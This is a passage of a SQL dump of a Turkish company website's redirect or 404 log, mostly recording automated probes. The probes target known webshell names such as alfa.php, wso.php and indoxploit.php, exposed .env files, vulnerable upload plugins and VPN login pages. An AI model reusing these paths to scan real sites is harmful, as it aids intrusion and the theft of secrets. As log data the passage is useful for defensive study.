00:00:00',301),(32597,'https://3s-technologies.com.tr/en/alfanew.php',NULL,'www.google.com','',3,0,'2023-06-16 07:38:07','0000-00-00 00:00:00',301),(32598,'http://3s-technologies.com.tr/en/wp-content/plugins/cache/cache.php',NULL,'www.google.com','',7,0,'2023-06-16 07:38:16','0000-00-00 00:00:00',301),(32599,'https://3s-technologies.com.tr/en/wp-consar.php',NULL,'www.google.com','',3,0,'2023-06-16 07:38:28','0000-00-00 00:00:00',301),(32600,'https://3s-technologies.com.tr/en/radio.php',NULL,'www.google.com','',15,0,'2023-06-16 07:38:44','0000-00-00 00:00:00',301),(32601,'http://3s-technologies.com.tr/en/wp-content/plugins/ghost/radio.php',NULL,'www.google.com','',1,0,'2023-06-16 07:38:56','0000-00-00 00:00:00',301),(32602,'https://3s-technologies.com.tr/en/wp-content/themes/applica/400.php',NULL,'www.google.com','',3,0,'2023-06-16 07:39:03','0000-00-00 00:00:00',301),(32603,'https://3s-technologies.com.tr/en/wp-content/themes/universal-news/www.php',NULL,'www.google.com','',3,0,'2023-06-16 07:39:12','0000-00-00 00:00:00',301),(32604,'http://3s-technologies.com.tr/tr/admin/public/js/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-16 14:56:42','0000-00-00 00:00:00',301),(32605,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-iåÿleme-aluminum-processing/aluminyum-iåÿleme-aluminum-processing',NULL,'','',1,0,'2023-06-17 06:42:32','0000-00-00 00:00:00',301),(32606,'https://3s-technologies.com.tr/tr/modules/modules/modules.php',NULL,'','',1,0,'2023-06-17 08:21:13','0000-00-00 00:00:00',301),(32607,'https://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',3,0,'2023-06-17 08:21:15','0000-00-00 00:00:00',301),(32608,'https://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',3,0,'2023-06-17 08:21:18','0000-00-00 00:00:00',301),(32609,'https://3s-technologies.com.tr/tr/libraries/joomla/css.php',NULL,'','',1,0,'2023-06-17 08:21:21','0000-00-00 00:00:00',301),(32610,'https://3s-technologies.com.tr/tr/libraries/joomla/jmails.php?u',NULL,'','',1,0,'2023-06-17 08:21:24','0000-00-00 00:00:00',301),(32611,'https://3s-technologies.com.tr/tr/libraries/joomla/jmail.php?u',NULL,'','',1,0,'2023-06-17 08:21:27','0000-00-00 00:00:00',301),(32612,'https://3s-technologies.com.tr/tr/images/vuln.php',NULL,'','',1,0,'2023-06-17 08:21:29','0000-00-00 00:00:00',301),(32613,'https://3s-technologies.com.tr/tr/tmp/vuln.php',NULL,'','',1,0,'2023-06-17 08:21:45','0000-00-00 00:00:00',301),(32614,'https://3s-technologies.com.tr/tr/marvins.php',NULL,'','',2,0,'2023-06-17 08:22:04','0000-00-00 00:00:00',301),(32615,'https://3s-technologies.com.tr/tr/rxr.php?rxr',NULL,'','',1,0,'2023-06-17 08:22:07','0000-00-00 00:00:00',301),(32616,'https://3s-technologies.com.tr/tr/olux.php',NULL,'','',2,0,'2023-06-17 08:22:09','0000-00-00 00:00:00',301),(32617,'https://3s-technologies.com.tr/tr/indoxploit.php',NULL,'','',2,0,'2023-06-17 08:22:12','0000-00-00 00:00:00',301),(32618,'https://3s-technologies.com.tr/tr/error.php',NULL,'','',1,0,'2023-06-17 08:22:15','0000-00-00 00:00:00',301),(32619,'https://3s-technologies.com.tr/tr/rxr.php',NULL,'','',3,0,'2023-06-17 08:22:17','0000-00-00 00:00:00',301),(32620,'https://3s-technologies.com.tr/tr/components/com_b2jcontact/izoc.php',NULL,'','',1,0,'2023-06-17 08:22:21','0000-00-00 00:00:00',301),(32621,'https://3s-technologies.com.tr/tr/v3.php',NULL,'','',1,0,'2023-06-17 08:22:23','0000-00-00 00:00:00',301),(32622,'https://3s-technologies.com.tr/tr/v5.php',NULL,'','',1,0,'2023-06-17 08:22:25','0000-00-00 00:00:00',301),(32623,'https://3s-technologies.com.tr/tr/templates/beez/index.php',NULL,'','',5,0,'2023-06-17 08:22:47','0000-00-00 00:00:00',301),(32624,'https://3s-technologies.com.tr/tr/templates/ja_purity/index.php',NULL,'','',1,0,'2023-06-17 08:22:51','0000-00-00 00:00:00',301),(32625,'https://3s-technologies.com.tr/tr/templates/rhuk_milkyway/index.php',NULL,'','',1,0,'2023-06-17 08:22:54','0000-00-00 00:00:00',301),(32626,'http://3s-technologies.com.tr/en/alfanew.php7',NULL,'','',7,0,'2023-06-17 23:43:07','0000-00-00 00:00:00',301),(32627,'http://3s-technologies.com.tr/tr/js/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-18 04:36:18','0000-00-00 00:00:00',301),(32628,'http://mail.3s-technologies.com.tr/tr/alfa_data/alfacgiapi',NULL,'','',2,0,'2023-06-19 15:10:59','0000-00-00 00:00:00',301),(32629,'http://mail.3s-technologies.com.tr/tr/wp-admin/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:02','0000-00-00 00:00:00',301),(32630,'http://mail.3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:03','0000-00-00 00:00:00',301),(32631,'http://mail.3s-technologies.com.tr/tr/wp-plugins/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:04','0000-00-00 00:00:00',301),(32632,'http://mail.3s-technologies.com.tr/tr/wp-includes/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:05','0000-00-00 00:00:00',301),(32633,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',1,0,'2023-06-19 15:11:06','0000-00-00 00:00:00',301),(32634,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/savepng.php',NULL,'','',1,0,'2023-06-19 15:11:07','0000-00-00 00:00:00',301),(32635,'http://mail.3s-technologies.com.tr/tr/uploads/pengumuman/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:08','0000-00-00 00:00:00',301),(32636,'http://mail.3s-technologies.com.tr/tr/uploads/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:09','0000-00-00 00:00:00',301),(32637,'http://mail.3s-technologies.com.tr/tr/images/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:10','0000-00-00 00:00:00',301),(32638,'http://mail.3s-technologies.com.tr/tr/img/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:11','0000-00-00 00:00:00',301),(32639,'http://mail.3s-technologies.com.tr/tr/wp-content/alfa_data',NULL,'','',1,0,'2023-06-19 15:11:12','0000-00-00 00:00:00',301),(32640,'http://mail.3s-technologies.com.tr/tr/assets/images/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:13','0000-00-00 00:00:00',301),(32641,'http://mail.3s-technologies.com.tr/tr/assets/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:17','0000-00-00 00:00:00',301),(32642,'http://mail.3s-technologies.com.tr/tr/upload/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:18','0000-00-00 00:00:00',301),(32643,'http://mail.3s-technologies.com.tr/tr/media/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:20','0000-00-00 00:00:00',301),(32644,'http://mail.3s-technologies.com.tr/tr/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:21','0000-00-00 00:00:00',301),(32645,'http://mail.3s-technologies.com.tr/tr/cgialfa',NULL,'','',1,0,'2023-06-19 15:11:22','0000-00-00 00:00:00',301),(32646,'http://mail.3s-technologies.com.tr/tr/css/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:23','0000-00-00 00:00:00',301),(32647,'http://mail.3s-technologies.com.tr/tr/upload/galeri/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:27','0000-00-00 00:00:00',301),(32648,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/alfa_data/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:29','0000-00-00 00:00:00',301),(32649,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/alfacgiapi',NULL,'','',1,0,'2023-06-19 15:11:30','0000-00-00 00:00:00',301),(32650,'http://mail.3s-technologies.com.tr/tr/about.php',NULL,'','',130,0,'2023-06-20 16:19:45','0000-00-00 00:00:00',301),(32651,'http://mail.3s-technologies.com.tr/tr/c.php',NULL,'','',18,0,'2023-06-20 16:19:49','0000-00-00 00:00:00',301),(32652,'http://mail.3s-technologies.com.tr/tr/fw.php',NULL,'','',16,0,'2023-06-20 16:19:56','0000-00-00 00:00:00',301),(32653,'http://mail.3s-technologies.com.tr/tr/alfa.php',NULL,'','',113,0,'2023-06-20 16:19:57','0000-00-00 00:00:00',301),(32654,'http://mail.3s-technologies.com.tr/tr/mini.php',NULL,'','',41,0,'2023-06-20 16:19:58','0000-00-00 00:00:00',301),(32655,'http://mail.3s-technologies.com.tr/tr/x.php',NULL,'','',79,0,'2023-06-20 16:19:59','0000-00-00 00:00:00',301),(32656,'http://mail.3s-technologies.com.tr/tr/404.php',NULL,'','',89,0,'2023-06-20 16:20:00','0000-00-00 00:00:00',301),(32657,'http://mail.3s-technologies.com.tr/tr/403.php',NULL,'','',104,0,'2023-06-20 16:20:01','0000-00-00 00:00:00',301),(32658,'http://mail.3s-technologies.com.tr/tr/wso.php',NULL,'','',27,0,'2023-06-20 16:20:03','0000-00-00 00:00:00',301),(32659,'http://mail.3s-technologies.com.tr/tr/admin.php',NULL,'','',114,0,'2023-06-20 16:20:04','0000-00-00 00:00:00',301),(32660,'http://mail.3s-technologies.com.tr/tr/wp-22.php',NULL,'','',11,0,'2023-06-20 16:20:05','0000-00-00 00:00:00',301),(32661,'http://mail.3s-technologies.com.tr/tr/marijuana.php',NULL,'','',15,0,'2023-06-20 16:20:07','0000-00-00 00:00:00',301),(32662,'http://mail.3s-technologies.com.tr/tr/good.php',NULL,'','',6,0,'2023-06-20 16:20:08','0000-00-00 00:00:00',301),(32663,'http://mail.3s-technologies.com.tr/tr/up.php',NULL,'','',25,0,'2023-06-20 16:20:09','0000-00-00 00:00:00',301),(32664,'http://mail.3s-technologies.com.tr/tr/alfa_enc.php',NULL,'','',1,0,'2023-06-20 16:20:11','0000-00-00 00:00:00',301),(32665,'http://mail.3s-technologies.com.tr/tr/alfa4.php',NULL,'','',1,0,'2023-06-20 16:20:12','0000-00-00 00:00:00',301),(32666,'http://mail.3s-technologies.com.tr/tr/alfamidi.php',NULL,'','',1,0,'2023-06-20 16:20:13','0000-00-00 00:00:00',301),(32667,'http://mail.3s-technologies.com.tr/tr/alfa‑ioxi.php',NULL,'','',1,0,'2023-06-20 16:20:14','0000-00-00 00:00:00',301),(32668,'http://mail.3s-technologies.com.tr/tr/alfapas.php',NULL,'','',1,0,'2023-06-20 16:20:15','0000-00-00 00:00:00',301),(32669,'http://mail.3s-technologies.com.tr/tr/alfanew.php',NULL,'','',9,0,'2023-06-20 16:20:16','0000-00-00 00:00:00',301),(32670,'http://mail.3s-technologies.com.tr/tr/alfabepas.php',NULL,'','',1,0,'2023-06-20 16:20:17','0000-00-00 00:00:00',301),(32671,'http://mail.3s-technologies.com.tr/tr/alfa-rex.php',NULL,'','',3,0,'2023-06-20 16:20:18','0000-00-00 00:00:00',301),(32672,'http://mail.3s-technologies.com.tr/tr/alfa-rex.php7',NULL,'','',12,0,'2023-06-20 16:20:19','0000-00-00 00:00:00',301),(32673,'http://mail.3s-technologies.com.tr/tr/alfav41.php',NULL,'','',1,0,'2023-06-20 16:20:20','0000-00-00 00:00:00',301),(32674,'http://mail.3s-technologies.com.tr/tr/auto_seo.php',NULL,'','',1,0,'2023-06-20 16:20:22','0000-00-00 00:00:00',301),(32675,'http://mail.3s-technologies.com.tr/tr/content.php',NULL,'','',37,0,'2023-06-20 16:20:23','0000-00-00 00:00:00',301),(32676,'http://mail.3s-technologies.com.tr/tr/t6x.php',NULL,'','',1,0,'2023-06-20 16:20:24','0000-00-00 00:00:00',301),(32677,'http://mail.3s-technologies.com.tr/tr/zz.php',NULL,'','',6,0,'2023-06-20 16:20:25','0000-00-00 00:00:00',301),(32678,'http://mail.3s-technologies.com.tr/tr/bypass403.php',NULL,'','',1,0,'2023-06-20 16:20:26','0000-00-00 00:00:00',301),(32679,'http://mail.3s-technologies.com.tr/tr/webshell.php',NULL,'','',1,0,'2023-06-20 16:20:27','0000-00-00 00:00:00',301),(32680,'http://mail.3s-technologies.com.tr/tr/eagle.php',NULL,'','',1,0,'2023-06-20 16:20:28','0000-00-00 00:00:00',301),(32681,'http://mail.3s-technologies.com.tr/tr/0byt3.php',NULL,'','',1,0,'2023-06-20 16:20:30','0000-00-00 00:00:00',301),(32682,'http://mail.3s-technologies.com.tr/tr/gel4y.shtml',NULL,'','',1,0,'2023-06-20 16:20:31','0000-00-00 00:00:00',301),(32683,'http://mail.3s-technologies.com.tr/tr/gel4y.php',NULL,'','',11,0,'2023-06-20 16:20:32','0000-00-00 00:00:00',301),(32684,'http://mail.3s-technologies.com.tr/tr/priv.php',NULL,'','',4,0,'2023-06-20 16:20:34','0000-00-00 00:00:00',301),(32685,'http://mail.3s-technologies.com.tr/tr/alfa403.php',NULL,'','',2,0,'2023-06-20 16:20:35','0000-00-00 00:00:00',301),(32686,'http://mail.3s-technologies.com.tr/tr/upload.php',NULL,'','',8,0,'2023-06-20 16:20:37','0000-00-00 00:00:00',301),(32687,'http://mail.3s-technologies.com.tr/tr/uploader.php',NULL,'','',6,0,'2023-06-20 16:20:38','0000-00-00 00:00:00',301),(32688,'http://mail.3s-technologies.com.tr/tr/idx.php',NULL,'','',1,0,'2023-06-20 16:20:39','0000-00-00 00:00:00',301),(32689,'http://mail.3s-technologies.com.tr/tr/indo.php',NULL,'','',13,0,'2023-06-20 16:20:40','0000-00-00 00:00:00',301),(32690,'http://mail.3s-technologies.com.tr/tr/shell4.php',NULL,'','',1,0,'2023-06-20 16:20:41','0000-00-00 00:00:00',301),(32691,'http://mail.3s-technologies.com.tr/tr/ups.php',NULL,'','',7,0,'2023-06-20 16:20:42','0000-00-00 00:00:00',301),(32692,'http://mail.3s-technologies.com.tr/tr/ru.php',NULL,'','',3,0,'2023-06-20 16:20:43','0000-00-00 00:00:00',301),(32693,'http://mail.3s-technologies.com.tr/tr/if.php',NULL,'','',6,0,'2023-06-20 16:20:44','0000-00-00 00:00:00',301),(32694,'http://mail.3s-technologies.com.tr/tr/yuuki.php',NULL,'','',1,0,'2023-06-20 16:20:45','0000-00-00 00:00:00',301),(32695,'http://3s-technologies.com.tr/tr/assets/global/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-21 06:29:48','0000-00-00 00:00:00',301),(32696,'https://3s-technologies.com.tr/en/.env.production',NULL,'https://www.google.com/','',6,0,'2023-06-21 08:45:54','0000-00-00 00:00:00',301),(32697,'https://3s-technologies.com.tr/en/static../.env',NULL,'https://www.google.com/','',1,0,'2023-06-21 08:45:55','0000-00-00 00:00:00',301),(32698,'https://3s-technologies.com.tr/en/wordpress.env',NULL,'https://www.google.com/','',1,0,'2023-06-21 08:45:56','0000-00-00 00:00:00',301),(32699,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,`p`.product_sku/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-06-21 14:56:08','0000-00-00 00:00:00',301),(32700,'https://3s-technologies.com.tr/tr/community',NULL,'https://3s-technologies.com.tr/tr/community','',1,0,'2023-06-22 09:40:59','0000-00-00 00:00:00',301),(32701,'http://3s-technologies.com.tr/en/wp-admin/repeater.php',NULL,'','',2,0,'2023-06-22 13:12:05','0000-00-00 00:00:00',301),(32702,'http://3s-technologies.com.tr/en/wp-includes/repeater.php',NULL,'','',2,0,'2023-06-22 13:12:06','0000-00-00 00:00:00',301),(32703,'http://3s-technologies.com.tr/en/wp-content/repeater.php',NULL,'','',2,0,'2023-06-22 13:12:06','0000-00-00 00:00:00',301),(32704,'http://3s-technologies.com.tr/tr/public/assets/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-22 16:44:31','0000-00-00 00:00:00',301),(32705,'http://3s-technologies.com.tr/tr/public/assets/uploadify/uploadify.css',NULL,'','',2,0,'2023-06-24 06:41:32','0000-00-00 00:00:00',301),(32706,'https://www.3s-technologies.com.tr/.env',NULL,'','',1,0,'2023-06-24 14:05:19','0000-00-00 00:00:00',301),(32707,'https://3s-technologies.com.tr/tr/ecrire/paquet.xml',NULL,'https://3s-technologies.com.tr/ecrire/paquet.xml','',1,0,'2023-06-25 15:41:26','0000-00-00 00:00:00',301),(32708,'http://www.3s-technologies.com.tr/en/wp-content/about.php',NULL,'www.google.com','',2,0,'2023-06-26 00:17:00','0000-00-00 00:00:00',301),(32709,'http://www.3s-technologies.com.tr/en/cong.php',NULL,'www.google.com','',1,0,'2023-06-26 00:17:02','0000-00-00 00:00:00',301),(32710,'https://3s-technologies.com.tr/en/.well-known/gpc.json',NULL,'','',1,0,'2023-06-26 02:42:44','0000-00-00 00:00:00',301),(32711,'https://3s-technologies.com.tr/en/app-ads.txt',NULL,'','',2,0,'2023-06-26 02:43:04','0000-00-00 00:00:00',301),(32712,'https://3s-technologies.com.tr/en/ads.txt',NULL,'','',60,0,'2023-06-26 02:43:29','0000-00-00 00:00:00',301),(32713,'https://3s-technologies.com.tr/en/.well-known/openid-configuration',NULL,'','',1,0,'2023-06-26 02:43:33','0000-00-00 00:00:00',301),(32714,'https://3s-technologies.com.tr/en/.well-known/nodeinfo',NULL,'','',1,0,'2023-06-26 02:44:04','0000-00-00 00:00:00',301),(32715,'https://3s-technologies.com.tr/en/.well-known/trust.txt',NULL,'','',1,0,'2023-06-26 02:44:11','0000-00-00 00:00:00',301),(32716,'https://3s-technologies.com.tr/en/.well-known/dnt-policy.txt',NULL,'','',1,0,'2023-06-26 02:44:24','0000-00-00 00:00:00',301),(32717,'https://3s-technologies.com.tr/en/.well-known/ai-plugin.json',NULL,'','',1,0,'2023-06-26 02:44:27','0000-00-00 00:00:00',301),(32718,'http://3s-technologies.com.tr/tr/wp-content/plugins/wc-multivendor-membership/assets/css/wcfmvm-style-memberships.css',NULL,'','',2,0,'2023-06-26 09:23:20','0000-00-00 00:00:00',301),(32719,'http://3s-technologies.com.tr/en/wp-cc.php',NULL,'','',1,0,'2023-06-26 21:11:21','0000-00-00 00:00:00',301),(32720,'https://mail.3s-technologies.com.tr/en/favicon.ico',NULL,'','',1,0,'2023-06-26 23:08:37','0000-00-00 00:00:00',301),(32721,'http://3s-technologies.com.tr/tr/public/assets/global/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-27 02:40:56','0000-00-00 00:00:00',301),(32722,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',2,0,'2023-06-27 03:13:43','0000-00-00 00:00:00',301),(32723,'http://3s-technologies.com.tr/tr/public/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-28 18:04:22','0000-00-00 00:00:00',301),(32724,'http://3s-technologies.com.tr/tr/admin/assets/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-06-30 04:39:20','0000-00-00 00:00:00',301),(32725,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-post-author/assets/css/awpa-frontend-style.css',NULL,'','',1,0,'2023-06-30 08:45:06','0000-00-00 00:00:00',301),(32726,'http://www.3s-technologies.com.tr/en/wp-includes/simplepie/content/about.php',NULL,'www.google.com','',1,0,'2023-06-30 16:11:27','0000-00-00 00:00:00',301),(32727,'http://www.3s-technologies.com.tr/en/wp-admin/network/index.php',NULL,'www.google.com','',1,0,'2023-06-30 16:11:33','0000-00-00 00:00:00',301),(32728,'http://www.3s-technologies.com.tr/en/wp-includes/fonts/index.php',NULL,'www.google.com','',1,0,'2023-06-30 16:11:38','0000-00-00 00:00:00',301),(32729,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',2,0,'2023-07-01 10:11:47','0000-00-00 00:00:00',301),(32730,'http://3s-technologies.com.tr/en/class_api.php',NULL,'','',1,0,'2023-07-01 15:07:18','0000-00-00 00:00:00',301),(32731,'http://3s-technologies.com.tr/en/wp-content/plugins/fix/up.php',NULL,'','',5,0,'2023-07-01 23:21:02','0000-00-00 00:00:00',301),(32732,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/dalga-lehim/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-07-02 04:45:08','0000-00-00 00:00:00',301),(32733,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,ordering?language=tr-tr&keyword=',NULL,'','',1,0,'2023-07-02 17:52:47','0000-00-00 00:00:00',301),(32734,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-07-03 05:41:46','0000-00-00 00:00:00',301),(32735,'http://3s-technologies.com.tr/en/wp-includes/simplepie/content/about.php',NULL,'www.google.com','',1,0,'2023-07-03 10:50:15','0000-00-00 00:00:00',301),(32736,'http://3s-technologies.com.tr/en/wp-admin/network/index.php',NULL,'www.google.com','',53,0,'2023-07-03 10:50:25','0000-00-00 00:00:00',301),(32737,'http://3s-technologies.com.tr/en/wp-includes/fonts/index.php',NULL,'www.google.com','',39,0,'2023-07-03 10:50:30','0000-00-00 00:00:00',301),(32738,'https://3s-technologies.com.tr/en/images/brochures/panacim_en_20_0101.pdf',NULL,'','',1,0,'2023-07-03 22:44:29','0000-00-00 00:00:00',301),(32739,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/wcg9lbohd14.php',NULL,'www.google.com','',4,0,'2023-07-04 00:48:51','0000-00-00 00:00:00',301),(32740,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/i8hqok6nr.php',NULL,'www.google.com','',4,0,'2023-07-04 00:49:03','0000-00-00 00:00:00',301),(32741,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/jayqifduncb.php',NULL,'www.google.com','',4,0,'2023-07-04 00:49:20','0000-00-00 00:00:00',301),(32742,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/drmenfqxuws.php',NULL,'www.google.com','',4,0,'2023-07-04 00:49:21','0000-00-00 00:00:00',301),(32743,'http://3s-technologies.com.tr/tr/assets/admin/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-07-04 17:14:00','0000-00-00 00:00:00',301),(32744,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,mf_name?language=tr-tr&keyword=',NULL,'','',2,0,'2023-07-06 19:32:31','0000-00-00 00:00:00',301),(32745,'http://3s-technologies.com.tr/tr/assets/backend/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-07-07 02:09:34','0000-00-00 00:00:00',301),(32746,'https://3s-technologies.com.tr/tr/cscosslc/tunnel',NULL,'','',1,0,'2023-07-07 03:52:20','0000-00-00 00:00:00',301),(32747,'https://3s-technologies.com.tr/clients',NULL,'','',1,0,'2023-07-07 03:52:22','0000-00-00 00:00:00',301),(32748,'https://3s-technologies.com.tr/tr/remote/login',NULL,'','',1,0,'2023-07-07 03:52:23','0000-00-00 00:00:00',301),(32749,'https://3s-technologies.com.tr/tr/myvpn?sess=none&hdlc_framing=no&ipv4=1&ipv6=1&z=none&hostname=none',NULL,'','',1,0,'2023-07-07 03:52:23','0000-00-00 00:00:00',301),(32750,'https://3s-technologies.com.tr/global-protect/prelogin.esp?tmp=tmp&clientver=4100&clientos=windows',NULL,'','',1,0,'2023-07-07 03:52:24','0000-00-00 00:00:00',301),(32751,'https://3s-technologies.com.tr/tr/rdweb',NULL,'','',1,0,'2023-07-07 03:52:26','0000-00-00 00:00:00',301),(32752,'https://3s-technologies.com.tr/tr/svpn/index.cgi',NULL,'','',1,0,'2023-07-07 03:52:26','0000-00-00 00:00:00',301),(32753,'https://3s-technologies.com.tr/tr/dana-na',NULL,'','',1,0,'2023-07-07 03:52:27','0000-00-00 00:00:00',301),(32754,'https://3s-technologies.com.tr/tr/sslvpnclient?launchplatform=mac&neproto=3&supportipv6=yes',NULL,'','',1,0,'2023-07-07 03:52:27','0000-00-00 00:00:00',301),(32755,'https://3s-technologies.com.tr/tr/my.policy',NULL,'','',1,0,'2023-07-07 03:52:27','0000-00-00 00:00:00',301),(32756,'https://3s-technologies.com.tr/ssl-vpn/prelogin.esp?tmp=tmp&clientver=4100&clientos=windows',NULL,'','',1,0,'2023-07-07 03:52:27','0000-00-00 00:00:00',301),(32757,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,product_name?language=tr-tr&keyword=',NULL,'','',2,0,'2023-07-07 08:17:47','0000-00-00 00:00:00',301),(32758,'http://3s-technologies.com.tr/en/xl2023.php',NULL,'','',5,0,'2023-07-07 09:50:23','0000-00-00 00:00:00',301),(32759,'http://www.3s-technologies.com.tr/tr/wp-content/themes/classic/inc/index.php',NULL,'','',2,0,'2023-07-08 06:27:43','0000-00-00 00:00:00',301),(32760,'http://www.3s-technologies.com.tr/tr/wp-content/rxr_rkbin.php',NULL,'','',1,0,'2023-07-08 06:27:45','0000-00-00 00:00:00',301),(32761,'http://www.3s-technologies.com.tr/tr/wp-content/rxr_exuvr.php',NULL,'','',1,0,'2023-07-08 06:27:48','0000-00-00 00:00:00',301),(32762,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/core-stab/index.php',NULL,'','',3,0,'2023-07-08 06:28:01','0000-00-00 00:00:00',301),(32763,'http://www.3s-technologies.com.tr/tr/wp-content/rxr_jaapu.php',NULL,'','',1,0,'2023-07-08 06:28:13','0000-00-00 00:00:00',301),(32764,'http://www.3s-technologies.com.tr/tr/wp-content/rxr_txjpo.php',NULL,'','',1,0,'2023-07-08 06:28:16','0000-00-00 00:00:00',301),(32765,'http://www.3s-technologies.com.tr/tr/wp-content/rxr_quqjm.php',NULL,'','',1,0,'2023-07-08 06:28:20','0000-00-00 00:00:00',301),(32766,'http://3s-technologies.com.tr/tr/theme/assets/global/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-07-08 17:27:26','0000-00-00 00:00:00',301),(32767,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/flux',NULL,'','',1,0,'2023-07-09 06:10:34','0000-00-00 00:00:00',301),(32768,'http://3s-technologies.com.tr/tr/theme/assets/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2023-07-10 05:07:50','0000-00-00 00:00:00',301),(32769,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/perl.alfa',NULL,'','',3,0,'2023-07-10 06:18:07','0000-00-00 00:00:00',301),(32770,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,mf_name/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-07-10 22:47:41','0000-00-00 00:00:00',301),(32771,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,`p`.product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2023-07-12 08:16:13','0000-00-00 00:00:00',301),(32772,'http://3s-technologies.com.tr/tr/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello',NULL,'','',1,0,'2023-07-12 11:14:02','0000-00-00 00:00:00',301),(32773,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresss3cll/includes.php',NULL,'','',7,0,'2023-07-12 11:14:04','0000-00-00 00:00:00',301),(32774,'http://3s-technologies.com.tr/tr/wp-content/wp-file-config-examples.php',NULL,'','',1,0,'2023-07-12 11:14:05','0000-00-00 00:00:00',301),(32775,'http://3s-technologies.com.tr/tr/wp-content/plugins/press/wp-class.php',NULL,'','',31,0,'2023-07-12 11:14:06','0000-00-00 00:00:00',301),(32776,'http://3s-technologies.com.tr/tr/wp-content/plugins/modules/sid.php',NULL,'','',1,0,'2023-07-12 11:14:12','0000-00-00 00:00:00',301),(32777,'http://3s-technologies.com.tr/tr/cong.php',NULL,'','',498,0,'2023-07-12 11:14:13','0000-00-00 00:00:00',301),(32778,'http://3s-technologies.com.tr/tr/wp-admin/wp-1ogin_bak.php',NULL,'','',1,0,'2023-07-12 11:14:19','0000-00-00 00:00:00',301),(32779,'http://mail.3s-technologies.com.tr/tr/_profiler/empty/search/results',NULL,'','',3,0,'2023-07-12 20:05:47','0000-00-00 00:00:00',301),(32780,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,mf_name/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-07-13 19:29:08','0000-00-00 00:00:00',301),(32781,'http://3s-technologies.com.tr/tr/wp-content/plugins/ht-mega-for-elementor/assets/css/htbbootstrap.css',NULL,'','',4,0,'2023-07-14 22:15:16','0000-00-00 00:00:00',301),(32782,'http://3s-technologies.com.tr/en/cong.php',NULL,'www.google.com','',77,0,'2023-07-17 04:50:48','0000-00-00 00:00:00',301),(32783,'http://3s-technologies.com.tr/en//.env',NULL,'','',2,0,'2023-07-20 18:13:58','0000-00-00 00:00:00',301),(32784,'http://3s-technologies.com.tr/en//sendgrid/.env',NULL,'','',2,0,'2023-07-20 18:13:59','0000-00-00 00:00:00',301),(32785,'http://3s-technologies.com.tr/tr/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-07-21 